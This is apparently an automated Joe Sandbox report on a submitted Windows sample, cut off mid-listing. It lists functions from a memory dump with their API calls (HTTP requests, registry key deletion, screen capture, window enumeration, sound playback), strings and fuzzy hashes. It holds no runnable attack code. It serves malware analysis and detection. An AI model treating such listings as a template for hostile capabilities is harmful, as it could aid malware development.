Part of subcall function 00529944: GetWindowLongW.USER32(?,000000EB), ref: 00529952

Strings

0, xrefs: 005A6D98
tooltips_class32, xrefs: 005A6E58, 005A6EDD

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 506a175e713a4fc56172da299d6a9a383f13efea5092c41f58e99756c52f6758
Instruction ID: 3203997087ab0fa708173287b07fd1d54867da02243f37f160fb88a70989983f
Opcode Fuzzy Hash: 506a175e713a4fc56172da299d6a9a383f13efea5092c41f58e99756c52f6758
Instruction Fuzzy Hash: 92715B74144245AFDB25CF18DC84FABBFE9FB9A304F08041DF9998B2A1C770A949DB15

Function 0058C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0058C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0058C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0058C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0058C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0058C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0058C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0058C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0058C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0058C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0058C5F0
InternetCloseHandle.WININET(00000000), ref: 0058C5FB

Strings

, xrefs: 0058C575

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 0de946ff81234d531bb964b90ed3ced2c8a42ee93e6055016db4283a3cf7c6ac
Instruction ID: 2b1830867d0f22beec1514f2e3adb9b94de766b10f3f2ae826bf00e9bb3cd1cd
Opcode Fuzzy Hash: 0de946ff81234d531bb964b90ed3ced2c8a42ee93e6055016db4283a3cf7c6ac
Instruction Fuzzy Hash: 4F515DB1500205BFEB21AF64C948ABB7FFCFF19754F00441AF945A6210DB34E948AB70

Function 005A856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 005A8592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005A85A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005A85AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005A85BA
GlobalLock.KERNEL32(00000000), ref: 005A85C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005A85D7
GlobalUnlock.KERNEL32(00000000), ref: 005A85E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005A85E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005A85F8
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,005AFC38,?), ref: 005A8611
GlobalFree.KERNEL32(00000000), ref: 005A8621
GetObjectW.GDI32(?,00000018,?), ref: 005A8641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 005A8671
DeleteObject.GDI32(?), ref: 005A8699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 005A86AF

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: c142638163b670bec78de0c767baafebf5741859c793f1e3d40871ee5266ff19
Instruction ID: 5f37d3b040e4651022a9867580da52e8007f0476a1de009eac8babf7375f861b
Opcode Fuzzy Hash: c142638163b670bec78de0c767baafebf5741859c793f1e3d40871ee5266ff19
Instruction Fuzzy Hash: 9E41E675600208BFDB119FA5DC48EAE7FB8FF9AB11F144059F905EB260DB309905DB60

Function 005814BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00581502
VariantCopy.OLEAUT32(?,?), ref: 0058150B
VariantClear.OLEAUT32(?), ref: 00581517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 005815FB
VarR8FromDec.OLEAUT32(?,?), ref: 00581657
VariantInit.OLEAUT32(?), ref: 00581708
SysFreeString.OLEAUT32(?), ref: 0058178C
VariantClear.OLEAUT32(?), ref: 005817D8
VariantClear.OLEAUT32(?), ref: 005817E7
VariantInit.OLEAUT32(00000000), ref: 00581823

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00581625
Default, xrefs: 005816AF

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 9a3d38d32e5b81ba8e8486362f8bbeb01862d5c81780f4cca55b6c5f0e73332a
Instruction ID: 980ad9e6b04b45b22e0d3514e6d0f2b74c22002dd6da3711dbea11301e905e12
Opcode Fuzzy Hash: 9a3d38d32e5b81ba8e8486362f8bbeb01862d5c81780f4cca55b6c5f0e73332a
Instruction Fuzzy Hash: 4BD1E271A00916DBDB10AF65E889B7DBFB9BF86700F10846AE846BB180DB30DC46DF55

Function 0059B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD

Part of subcall function 0059C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059B6AE,?,?), ref: 0059C9B5
Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059C9F1
Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA68
Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0059B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0059B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0059B80A
RegCloseKey.ADVAPI32(?), ref: 0059B87E
RegCloseKey.ADVAPI32(?), ref: 0059B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0059B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0059B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0059B922
FreeLibrary.KERNEL32(00000000), ref: 0059B983
RegCloseKey.ADVAPI32(00000000), ref: 0059B994

Strings

advapi32.dll, xrefs: 0059B8ED
RegDeleteKeyExW, xrefs: 0059B8FE

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 6a1a88d45215d4979a5948132567b1484d54f2d3b5c5c73003281dc6ee59eb80
Instruction ID: 4ec804f3d070aa3baf3fd6b8bd418a48a303274b3022ac858df8b860c9b2d091
Opcode Fuzzy Hash: 6a1a88d45215d4979a5948132567b1484d54f2d3b5c5c73003281dc6ee59eb80
Instruction Fuzzy Hash: B9C17D30204202AFEB10DF14D599F6ABFE5FF84308F14855CE59A4B2A2CB75ED86CB91

Function 0059255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 005925D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 005925E8
CreateCompatibleDC.GDI32(?), ref: 005925F4
SelectObject.GDI32(00000000,?), ref: 00592601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0059266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 005926AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 005926D0
SelectObject.GDI32(?,?), ref: 005926D8
DeleteObject.GDI32(?), ref: 005926E1
DeleteDC.GDI32(?), ref: 005926E8
ReleaseDC.USER32(00000000,?), ref: 005926F3

Strings

(, xrefs: 0059268D

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 3771a5d100dbf3c6ed9c1b56c2a6246e6ad4e43d3aa2691de95fad4d6a925eb2
Instruction ID: 3c1a2fd0e8e0f01e1f23edcf63cf8a97ac779e41231635b2ac480e4f37ea9cc5
Opcode Fuzzy Hash: 3771a5d100dbf3c6ed9c1b56c2a6246e6ad4e43d3aa2691de95fad4d6a925eb2
Instruction Fuzzy Hash: A061D275E00219EFCF05CFA8D988AAEBBF5FF58310F208529E956A7250D770A941DF90

Function 0054DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0054DAA1

Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D659
Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D66B
Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D67D
Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D68F
Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6A1
Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6B3
Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6C5
Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6D7
Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6E9
Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6FB
Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D70D
Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D71F
Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D731

_free.LIBCMT ref: 0054DA96

Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0

_free.LIBCMT ref: 0054DAB8
_free.LIBCMT ref: 0054DACD
_free.LIBCMT ref: 0054DAD8
_free.LIBCMT ref: 0054DAFA
_free.LIBCMT ref: 0054DB0D
_free.LIBCMT ref: 0054DB1B
_free.LIBCMT ref: 0054DB26
_free.LIBCMT ref: 0054DB5E
_free.LIBCMT ref: 0054DB65
_free.LIBCMT ref: 0054DB82
_free.LIBCMT ref: 0054DB9A

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: b3ae0baad26f4e2af38f5549d0badfd1301e6b9d7241c27b315384a19c02709b
Instruction ID: 2d6e3b6f5a3c5c42a1fc12d99973f5fba1c2b25e96e381818fc4bf4e6d23e272
Opcode Fuzzy Hash: b3ae0baad26f4e2af38f5549d0badfd1301e6b9d7241c27b315384a19c02709b
Instruction Fuzzy Hash: 28312A316046069FEB22AA3AE849BDA7FF9FF40318F55441AF449D7291DA35AC80CB30

Function 0057365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0057369C
_wcslen.LIBCMT ref: 005736A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00573797
GetClassNameW.USER32(?,?,00000400), ref: 0057380C
GetDlgCtrlID.USER32(?), ref: 0057385D
GetWindowRect.USER32(?,?), ref: 00573882
GetParent.USER32(?), ref: 005738A0
ScreenToClient.USER32(00000000), ref: 005738A7
GetClassNameW.USER32(?,?,00000100), ref: 00573921
GetWindowTextW.USER32(?,?,00000400), ref: 0057395D

Strings

%s%u, xrefs: 00573734

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: b091d4a713847a398f5cf6878d371f3e932a002880d4072c36217f3b55f70b25
Instruction ID: 317b7c397bd0880e0e8153a9bc3f02a8e07af5eaf326be7df6a93a3a6328cd43
Opcode Fuzzy Hash: b091d4a713847a398f5cf6878d371f3e932a002880d4072c36217f3b55f70b25
Instruction Fuzzy Hash: D991B371204617AFD718DF24D885BAABFA8FF44360F008529FA9DD2190DB30EA45EB91

Function 00574954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00574994
GetWindowTextW.USER32(?,?,00000400), ref: 005749DA
_wcslen.LIBCMT ref: 005749EB
CharUpperBuffW.USER32(?,00000000), ref: 005749F7
_wcsstr.LIBVCRUNTIME ref: 00574A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00574A64
GetWindowTextW.USER32(?,?,00000400), ref: 00574A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00574AE6
GetClassNameW.USER32(?,?,00000400), ref: 00574B20
GetWindowRect.USER32(?,?), ref: 00574B8B

Strings

ThumbnailClass, xrefs: 00574A6F, 00574AF1

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 42d577b76fd0bda4483f780d65c0f34e8e3a9897fe1e0805741d6af090705f48
Instruction ID: 6862e355f64ae1b0f7a1f9936421b4d5cbe64e2ad6600e7fc6a1b810eebfb31d
Opcode Fuzzy Hash: 42d577b76fd0bda4483f780d65c0f34e8e3a9897fe1e0805741d6af090705f48
Instruction Fuzzy Hash: D891AA310042069FDB05DF14E985BAABFE9FF84314F04846AFD899A096EB30ED45DFA1

Function 005A8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 005A8D5A
GetFocus.USER32 ref: 005A8D6A
GetDlgCtrlID.USER32(00000000), ref: 005A8D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 005A8E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 005A8ECF
GetMenuItemCount.USER32(?), ref: 005A8EEC
GetMenuItemID.USER32(?,00000000), ref: 005A8EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 005A8F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 005A8F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 005A8FA1

Strings

0, xrefs: 005A8E9F

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 5cfac13686f633300e01b23d4243c478be06b0924e3e4b9303c259ba02cec675
Instruction ID: fbe2605fa42ec8feb1f36669579a9faec27f22c9a864aecfae981815a84f2d8a
Opcode Fuzzy Hash: 5cfac13686f633300e01b23d4243c478be06b0924e3e4b9303c259ba02cec675
Instruction Fuzzy Hash: 25818C71508302AFDB20CF24D888ABFBFE9FB9A354F140919F98597291DB70D905DBA1

Function 0059CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0059CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0059CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0059CD48

Part of subcall function 0059CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0059CCAA
Part of subcall function 0059CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0059CCBD
Part of subcall function 0059CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0059CCCF
Part of subcall function 0059CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0059CD05
Part of subcall function 0059CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0059CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0059CCF3

Strings

advapi32.dll, xrefs: 0059CCB8
RegDeleteKeyExW, xrefs: 0059CCC9

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: a64dd6b452da4cc87a53810dfd57076986f40d08d64c7ba6537ffcaba2ffda7f
Instruction ID: 76449b2b1065bb2c4135b0473957e9dec6189acc7770e4949f094441577c5f4f
Opcode Fuzzy Hash: a64dd6b452da4cc87a53810dfd57076986f40d08d64c7ba6537ffcaba2ffda7f
Instruction Fuzzy Hash: 94316E71A41229BBDB208B54DC88EFFBFBCFF56750F000165E905E6240DB349E49EAA0

Function 0057E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0057E6B4

Part of subcall function 0052E551: timeGetTime.WINMM(?,?,0057E6D4), ref: 0052E555

Sleep.KERNEL32(0000000A), ref: 0057E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0057E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0057E727
SetActiveWindow.USER32 ref: 0057E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0057E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0057E773
Sleep.KERNEL32(000000FA), ref: 0057E77E
IsWindow.USER32 ref: 0057E78A
EndDialog.USER32(00000000), ref: 0057E79B

Strings

BUTTON, xrefs: 0057E719

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: a494808b6dc206de66f1f48140752f687c2c423c56e22be94da2a861d6eeeb14
Instruction ID: f073b9751afbd4aa994e19799cc77203efcd0e95fc8a64b490d8719a6423eb07
Opcode Fuzzy Hash: a494808b6dc206de66f1f48140752f687c2c423c56e22be94da2a861d6eeeb14
Instruction Fuzzy Hash: 4B2162B0200385AFEF045F25FCCAA253F6DF77A349F108465F549861A5DFB1AC08BA24

Function 0057E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0057EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0057EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0057EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0057EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0057EAA7

Strings

status PlayMe mode, xrefs: 0057EA58
play PlayMe, xrefs: 0057EAA2
play PlayMe wait, xrefs: 0057EA91
alias PlayMe, xrefs: 0057EA36
close PlayMe, xrefs: 0057EA6E, 0057EA9B
open , xrefs: 0057EA0C

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 61a8cefd10ec93d11d4f7b626158cb2532e02c0f54a0e6227855c869ed93631e
